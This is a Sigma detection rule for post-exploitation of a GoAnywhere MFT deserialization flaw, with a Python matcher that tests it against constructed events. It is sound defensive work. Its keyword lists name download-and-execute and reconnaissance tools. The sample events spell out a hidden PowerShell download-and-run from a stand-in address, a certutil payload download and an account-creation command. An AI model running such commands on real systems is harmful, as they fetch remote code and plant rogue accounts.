Potential Exploitation of GoAnywhere MFT Vulnerability
Detects suspicious command execution by child processes of the GoAnywhere Managed File Transfer (MFT) Tomcat service. Such activity is consistent with post-exploitation of CVE-2025-10035, a deserialization flaw in the GoAnywhere License Servlet that can lead to command execution, as observed in campaigns attributed to the threat actor Storm-1175.
Rule status: developed to detect an active or emerging threat. Prioritize investigation of any alerts and correlate with threat intelligence.
Log source: Windows process creation events (Sigma category process_creation). These cover command-line arguments, parent/child relationships, and process metadata.
detection:
    # Detects the GoAnywhere Tomcat parent process based on its image path
    selection_parent:
        ParentImage|contains: '\GoAnywhere\tomcat\'
    selection_powershell_img:
        Image|endswith:
            - '\powershell.exe'
            - '\powershell_ise.exe'
            - '\pwsh.exe'
    selection_powershell_cmd:
        - CommandLine|contains|all:
            - 'IEX'
            - 'enc'
            - 'Hidden'
            - 'bypass'
        - CommandLine|re:
            - 'net\s+user'
            - 'net\s+group'
            - 'query\s+session'
        - CommandLine|contains:
            - 'whoami'
            - 'systeminfo'
            - 'dsquery'
            - 'localgroup administrators'
            - 'nltest'
            - 'samaccountname='
            - 'adscredentials'
            - 'o365accountconfiguration'
            - '.DownloadString('
            - '.DownloadFile('
            - 'FromBase64String('
            - 'System.IO.Compression'
            - 'System.IO.MemoryStream'
            - 'curl'
    selection_child_cmd:
        Image|endswith: '\cmd.exe'
        CommandLine|contains:
            - 'powershell'
            - 'whoami'
            - 'net.exe'
            - 'net1.exe'
            - 'rundll32'
            - 'quser'
            - 'nltest'
            - 'curl'
    selection_child_others:
        CommandLine|contains:
            - 'bitsadmin'
            - 'certutil'
            - 'mshta'
            - 'cscript'
            - 'wscript'
    condition: selection_parent and (all of selection_powershell_* or 1 of selection_child_*)

False positives: Legitimate administrative scripts or built-in GoAnywhere functions could trigger this rule. Tune the command-line lists to the normal activity in your environment; note that selection_child_others has no Image constraint, so any child of the Tomcat process whose command line mentions one of those tools will match.
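To check the rule's logic against concrete events before deploying it, the following Python matcher re-implements the selections and condition above and runs them over a handful of constructed process-creation events. This is an added example, not part of the Sigma rule or of any SigmaHQ tooling; the file paths, command lines and IP addresses in the sample events are made up for illustration. It follows Sigma's default matching semantics: contains and endswith compare case-insensitively, while the re modifier is case-sensitive unless the |i sub-modifier is added, which is why the upper-case NET USER sample below does not fire.

```python
import re

# Selection values copied from the detection block above.
PARENT_CONTAINS = "\\GoAnywhere\\tomcat\\"
POWERSHELL_IMAGES = ("\\powershell.exe", "\\powershell_ise.exe", "\\pwsh.exe")
PS_CMD_ALL = ("IEX", "enc", "Hidden", "bypass")
PS_CMD_RE = (r"net\s+user", r"net\s+group", r"query\s+session")
PS_CMD_ANY = ("whoami", "systeminfo", "dsquery", "localgroup administrators", "nltest",
              "samaccountname=", "adscredentials", "o365accountconfiguration",
              ".DownloadString(", ".DownloadFile(", "FromBase64String(",
              "System.IO.Compression", "System.IO.MemoryStream", "curl")
CMD_CHILD_ANY = ("powershell", "whoami", "net.exe", "net1.exe", "rundll32",
                 "quser", "nltest", "curl")
OTHER_CHILD_ANY = ("bitsadmin", "certutil", "mshta", "cscript", "wscript")


def _contains(value, needle):
    # Sigma string matching (contains/endswith) is case-insensitive by default.
    return needle.lower() in value.lower()


def _endswith(value, suffix):
    return value.lower().endswith(suffix.lower())


def evaluate(event):
    """Evaluate one process-creation event against the rule.

    Returns (fires, selections) where selections maps each Sigma selection
    name to whether it matched, so a tuning decision can see which branch hit.
    """
    parent = event.get("ParentImage", "")
    image = event.get("Image", "")
    cmdline = event.get("CommandLine", "")

    sel = {
        "selection_parent": _contains(parent, PARENT_CONTAINS),
        "selection_powershell_img": any(_endswith(image, s) for s in POWERSHELL_IMAGES),
        # A list under a selection is OR'ed; each entry is one sub-test.
        "selection_powershell_cmd": (
            all(_contains(cmdline, s) for s in PS_CMD_ALL)
            # re modifier: case-sensitive, as Sigma specifies without |i
            or any(re.search(p, cmdline) for p in PS_CMD_RE)
            or any(_contains(cmdline, s) for s in PS_CMD_ANY)
        ),
        "selection_child_cmd": _endswith(image, "\\cmd.exe")
        and any(_contains(cmdline, s) for s in CMD_CHILD_ANY),
        # No Image constraint here: only the command line is inspected.
        "selection_child_others": any(_contains(cmdline, s) for s in OTHER_CHILD_ANY),
    }

    # condition: selection_parent and (all of selection_powershell_* or 1 of selection_child_*)
    fires = sel["selection_parent"] and (
        (sel["selection_powershell_img"] and sel["selection_powershell_cmd"])
        or sel["selection_child_cmd"]
        or sel["selection_child_others"]
    )
    return fires, sel


# Constructed sample events (hypothetical paths and addresses, not real telemetry).
TOMCAT = "C:\\Program Files\\Fortra\\GoAnywhere\\tomcat\\bin\\tomcat9.exe"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
CMD = "C:\\Windows\\System32\\cmd.exe"
SAMPLE_EVENTS = {
    "ps_downloadstring": {"ParentImage": TOMCAT, "Image": PS, "CommandLine":
        'powershell.exe -w Hidden -ep bypass -c "IEX ((New-Object Net.WebClient).DownloadString(\'http://192.0.2.10/a.ps1\'))"'},
    "ps_net_user": {"ParentImage": TOMCAT, "Image": PS, "CommandLine":
        'powershell.exe -c "net user svc_backup P@ssw0rd /add"'},
    "ps_net_user_upper": {"ParentImage": TOMCAT, "Image": PS, "CommandLine":
        'powershell.exe -c "NET USER svc_backup P@ssw0rd /add"'},  # re is case-sensitive: no match
    "cmd_whoami": {"ParentImage": TOMCAT, "Image": CMD, "CommandLine":
        'cmd.exe /c whoami /all > C:\\Windows\\Temp\\out.txt'},
    "certutil_download": {"ParentImage": TOMCAT, "Image": "C:\\Windows\\System32\\certutil.exe",
        "CommandLine": "certutil.exe -urlcache -split -f http://192.0.2.10/x.dll C:\\Windows\\Temp\\x.dll"},
    "benign_dir": {"ParentImage": TOMCAT, "Image": CMD, "CommandLine":
        'cmd.exe /c dir "C:\\Program Files\\Fortra\\GoAnywhere\\userdata"'},
    "wrong_parent": {"ParentImage": "C:\\Windows\\explorer.exe", "Image": PS, "CommandLine":
        'powershell.exe -c "IEX ((New-Object Net.WebClient).DownloadString(\'http://192.0.2.10/a.ps1\'))"'},
}


def alerts(events):
    """Return the labels of the events that make the rule fire, in input order."""
    return [label for label, ev in events.items() if evaluate(ev)[0]]


if __name__ == "__main__":
    for label, ev in SAMPLE_EVENTS.items():
        fires, sel = evaluate(ev)
        hit = [name for name, ok in sel.items() if ok]
        print(f"{label:20} fires={fires!s:5} matched={hit}")
```

Running the block shows four of the seven samples firing, one per branch of the condition, and that the benign directory listing, the event with a non-GoAnywhere parent and the upper-case NET USER command do not. If your SIEM backend compiles Sigma re patterns case-insensitively the last of those would fire there; confirm the backend's behaviour rather than assuming it from the rule text.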